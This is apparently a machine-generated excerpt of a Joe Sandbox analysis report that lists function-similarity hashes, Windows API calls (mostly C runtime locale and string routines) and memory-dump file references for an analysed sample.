                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3736152602-0
                                                                                                                  • Opcode ID: a0ccaae2778d53ac4eaf82f567407d6402fcae9cb618f6bd10cd1d8b365cc483
                                                                                                                  • Instruction ID: e6ab74db627187a6a6dc905e4d4e70aac977216cfdec6788a2788e72c04e860c
                                                                                                                  • Opcode Fuzzy Hash: a0ccaae2778d53ac4eaf82f567407d6402fcae9cb618f6bd10cd1d8b365cc483
                                                                                                                  • Instruction Fuzzy Hash: 5811C672620206EBDF24AB68DC46ABB77E8EF04710B10017AF501D7281EB74ED00C7B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D9CB19,00000000,00000000,?), ref: 00D9CEA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3736152602-0
                                                                                                                  • Opcode ID: 56e60d5418110dfdcf1ff1d60418ac54bf009a56f8f0ac309d092e4309488cd9
                                                                                                                  • Instruction ID: 3e976ce1c21d135cac57bb4a6fe49f7f5150bab1e7818d7c704a2ca844b4ba0b
                                                                                                                  • Opcode Fuzzy Hash: 56e60d5418110dfdcf1ff1d60418ac54bf009a56f8f0ac309d092e4309488cd9
                                                                                                                  • Instruction Fuzzy Hash: 7A01DB36A24116ABDF189A2488456BB3758DB40354F154429BC43E7180EA70EE41C6F4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D9CBAF,00000001,?,?,?,?,00D9C6B5,?), ref: 00D9CB9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2417226690-0
                                                                                                                  • Opcode ID: 9291aac8f86cb5023ff0f676d040a6576edb9dd95285e1824055640479d099e7
                                                                                                                  • Instruction ID: cb31c30d7e1ef97d943ac3f9c21d024eceb2091a80029a3340816ae61f0a6081
                                                                                                                  • Opcode Fuzzy Hash: 9291aac8f86cb5023ff0f676d040a6576edb9dd95285e1824055640479d099e7
                                                                                                                  • Instruction Fuzzy Hash: D5F0F6362143045FDF146F39D886B7A7BD1EF8076CF09842DF9468B680D6B1AD02C670
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D93EA8: EnterCriticalSection.KERNEL32(?,?,00D97A60,?,00DB1970,00000008,00D97952,?,?,?), ref: 00D93EB7
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D98603,00000001,00DB19F0,0000000C,00D97F68,?), ref: 00D98648
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1272433827-0
                                                                                                                  • Opcode ID: 588b51672622ed04edebf5fa9316c92951541345904f40623e31d351ddebf7f1
                                                                                                                  • Instruction ID: 12e2e6c0feb5102eb877ec9e43884f59ac7aabdc4b18f85bfa01fecb9b22b48d
                                                                                                                  • Opcode Fuzzy Hash: 588b51672622ed04edebf5fa9316c92951541345904f40623e31d351ddebf7f1
                                                                                                                  • Instruction Fuzzy Hash: EAF03C76A00304EFDB00EF58E802B9977E0EB45761F00421AF410DB3A1CB7559448FB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D975D3: GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                    • Part of subcall function 00D975D3: SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00D9CCCF,00000001,?,?,?,00D9C70F,?), ref: 00D9CCBB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2417226690-0
                                                                                                                  • Opcode ID: 3d49975bcc6746b2d4a67397cc9adb8ba32c2749e6dea13801cda245229dc57d
                                                                                                                  • Instruction ID: e168e4af31570a71832e8d44fbe9d28bdc2f2033f683bba93c2e0df8fef59a0c
                                                                                                                  • Opcode Fuzzy Hash: 3d49975bcc6746b2d4a67397cc9adb8ba32c2749e6dea13801cda245229dc57d
                                                                                                                  • Instruction Fuzzy Hash: 25F0E53A34020597CF04AF35D85566ABF95EFC1750B0A4459EA0A8B390C6719942C7B0
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00D92C04,?,20001004,00000000,00000002,?,?,00D91B16), ref: 00D980A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: 91c8d5c3f81042b81af75a23d3f56cf1820271e7a247a65a33845066f834da30
                                                                                                                  • Instruction ID: b4151ae7aacf134806a26d5847d7e24d2e18ea5bb717d9d1aa2c5253e892ea67
                                                                                                                  • Opcode Fuzzy Hash: 91c8d5c3f81042b81af75a23d3f56cf1820271e7a247a65a33845066f834da30
                                                                                                                  • Instruction Fuzzy Hash: 49E01A31940218FBCF222F61DC08E9E3F25EB45B51F044010F959652218B32C921AAF4
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000B761), ref: 00D8B645
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 19c6f6f09d1edadb9434f8b44ee7cd9708751c3f39174783ac239647fc209504
                                                                                                                  • Instruction ID: 1287bda977ee5439e3bd784a0e4f0366dba50b3dabebd69b63dd44c2624dc381
                                                                                                                  • Opcode Fuzzy Hash: 19c6f6f09d1edadb9434f8b44ee7cd9708751c3f39174783ac239647fc209504
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  • Opcode ID: 52dddbca363546e0fd4c47fe27d3ce7f658cf4185077610079753a4c010fb2ef
                                                                                                                  • Instruction ID: 120d84bce2327c36babc349fc595bf34b8af0ad2ef0e60a749ae228d16620355
                                                                                                                  • Opcode Fuzzy Hash: 52dddbca363546e0fd4c47fe27d3ce7f658cf4185077610079753a4c010fb2ef
                                                                                                                  • Instruction Fuzzy Hash: 25A00270603315DF6B40CF355A0520A3999A94559170945556415C5261D665C5505A15
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a0907baeb3b7986130046a6955fb8050eedc45ce42398b13137112e4e65b2121
                                                                                                                  • Instruction ID: 25a2f028c61bc3b2c8eef277b50fb991164557d298ca31f6b83c76cce624c355
                                                                                                                  • Opcode Fuzzy Hash: a0907baeb3b7986130046a6955fb8050eedc45ce42398b13137112e4e65b2121
                                                                                                                  • Instruction Fuzzy Hash: F55177B4D1020A9FCB40DFA8D591AEEBBF4EB09350F24545AE815FB210E634AA41CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a71f0eae71ac0437cfc89747f09ac92ea174a64d373775db1beab66c8ca7f672
                                                                                                                  • Instruction ID: bfb3e9d1acac1dbb3a61a4f247fd20356cb29c9a64a72400f978c420e92b6908
                                                                                                                  • Opcode Fuzzy Hash: a71f0eae71ac0437cfc89747f09ac92ea174a64d373775db1beab66c8ca7f672
                                                                                                                  • Instruction Fuzzy Hash: B1D0923A645A58EFC211CF49E440D41F7B8FB8D670B154166EA0893B20C331FC11CAE0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: 4e5c5a88b65927b853927d8ab3a5c24a0a31eb24433dd80fcdd3c0c1abc90d49
                                                                                                                  • Instruction ID: 94116349f33835ac8efebb53bf97aa351e812ae422b8ae87821aac27f75c9535
                                                                                                                  • Opcode Fuzzy Hash: 4e5c5a88b65927b853927d8ab3a5c24a0a31eb24433dd80fcdd3c0c1abc90d49
                                                                                                                  • Instruction Fuzzy Hash: 8671E472904606AFDF21AE649C41FAF7BA9DF46310F2C005AFD54A7285EB35DE4087B1
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D8BCAC
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BCD8
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D8BD17
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8BD34
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D8BD73
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BD90
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D8BDD2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D8BDF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2040435927-0
                                                                                                                  • Opcode ID: 2ddaaa7603d62676d94886a1c08aa48b840ef0b90cc30afdd411419d588edd54
                                                                                                                  • Instruction ID: 4244f9e138224a7785dc4f17ce47585284e1022e24fd95451c5802de54d36dbe
                                                                                                                  • Opcode Fuzzy Hash: 2ddaaa7603d62676d94886a1c08aa48b840ef0b90cc30afdd411419d588edd54
                                                                                                                  • Instruction Fuzzy Hash: 2A518E72600206FFEF216F61CC45FAB7BA9EB44760F29412AFA15E6190DB34DD118BB0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3213747228-0
                                                                                                                  • Opcode ID: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
                                                                                                                  • Instruction ID: fd437cda39d1fbcfdcdadfb376c9d5b68b520caf9c4d8970326f8ac2a40bac8f
                                                                                                                  • Opcode Fuzzy Hash: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
                                                                                                                  • Instruction Fuzzy Hash: 4DB10473A002659FDF118F6CCC82BAEBBA5EF55350F198155E948AB282D274D901C7F2
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CBD7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D8CBDF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CC68
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D8CC93
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CCE8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 50228187dd9e6d530b13f8f07a6caccd686cc025b377d21228d84dc99a896472
                                                                                                                  • Instruction ID: af0a66af44b1706bacb058701c8f7702600fa734a9b50d2388e8e532ab84b1cf
                                                                                                                  • Opcode Fuzzy Hash: 50228187dd9e6d530b13f8f07a6caccd686cc025b377d21228d84dc99a896472
                                                                                                                  • Instruction Fuzzy Hash: 6E41E334A20218EFCF10EF68C885A9EBBB1EF45314F188155E8199B362D731EE15CBB5
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D8BEE2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D8BEF0
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D8BF01
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction ID: 19d8e03ab6a69d5fd0a37f06f6cb00b76ab536f4c2ccc15aec5c1cad734ee3eb
                                                                                                                  • Opcode Fuzzy Hash: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction Fuzzy Hash: 6FD09E79656354EF97005B707C098973FA5DA467513068257F411D3361E6B455048F71
